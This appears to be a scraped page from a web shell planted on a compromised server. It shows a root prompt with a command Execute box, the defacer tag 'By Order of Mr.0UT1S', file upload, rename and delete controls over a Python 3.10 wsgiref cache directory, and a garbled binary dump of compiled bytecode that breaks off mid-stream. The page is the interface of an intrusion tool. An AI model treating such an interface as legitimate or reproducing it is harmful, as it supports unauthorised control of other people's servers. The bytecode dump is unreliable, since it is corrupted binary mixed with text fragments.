opt
/
alt
/
python310
/
lib64
/
python3.10
/
wsgiref
/
__pycache__
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
__init__.cpython-310.opt-1.pyc
743 bytes
Rename
Delete
__init__.cpython-310.opt-2.pyc
148 bytes
Rename
Delete
__init__.cpython-310.pyc
743 bytes
Rename
Delete
handlers.cpython-310.opt-1.pyc
15.58 KB
Rename
Delete
handlers.cpython-310.opt-2.pyc
10.42 KB
Rename
Delete
handlers.cpython-310.pyc
16.03 KB
Rename
Delete
headers.cpython-310.opt-1.pyc
7.51 KB
Rename
Delete
headers.cpython-310.opt-2.pyc
4.42 KB
Rename
Delete
headers.cpython-310.pyc
7.55 KB
Rename
Delete
simple_server.cpython-310.opt-1.pyc
5.20 KB
Rename
Delete
simple_server.cpython-310.opt-2.pyc
4.46 KB
Rename
Delete
simple_server.cpython-310.pyc
5.20 KB
Rename
Delete
util.cpython-310.opt-1.pyc
5.30 KB
Rename
Delete
util.cpython-310.opt-2.pyc
3.79 KB
Rename
Delete
util.cpython-310.pyc
5.30 KB
Rename
Delete
validate.cpython-310.opt-1.pyc
14.27 KB
Rename
Delete
validate.cpython-310.opt-2.pyc
10.73 KB
Rename
Delete
validate.cpython-310.pyc
14.27 KB
Rename
Delete
o �?Og3 � @ s4 d Z ddlmZmZ ddlZddlZddlmZ ddl m Z dZg d�Zde Z e � d ej�� d Ze d e ZG dd� de�ZG d d� de�ZG dd� de�Zdd� Zeefdd�Zedkr�edde��'Zej�� Zeded ded d� ddlZe�d� e�� W d � dS 1 s�w Y dS dS )a! BaseHTTPServer that implements the Python WSGI protocol (PEP 3333) This is both an example of how WSGI can be implemented, and a basis for running simple web applications on a local machine, such as might be done when testing or debugging an application. It has not been reviewed for security issues, however, and we strongly recommend that you use a "real" web server for production use. For example usage, see the 'if __name__=="__main__"' block at the end of the module. See also the BaseHTTPServer module docs for other API information. � )�BaseHTTPRequestHandler� HTTPServerN)� SimpleHandler)�python_implementationz0.2)� WSGIServer�WSGIRequestHandler�demo_app�make_server�WSGIServer/�/� c @ s e Zd ZeZdd� ZdS )� ServerHandlerc C s<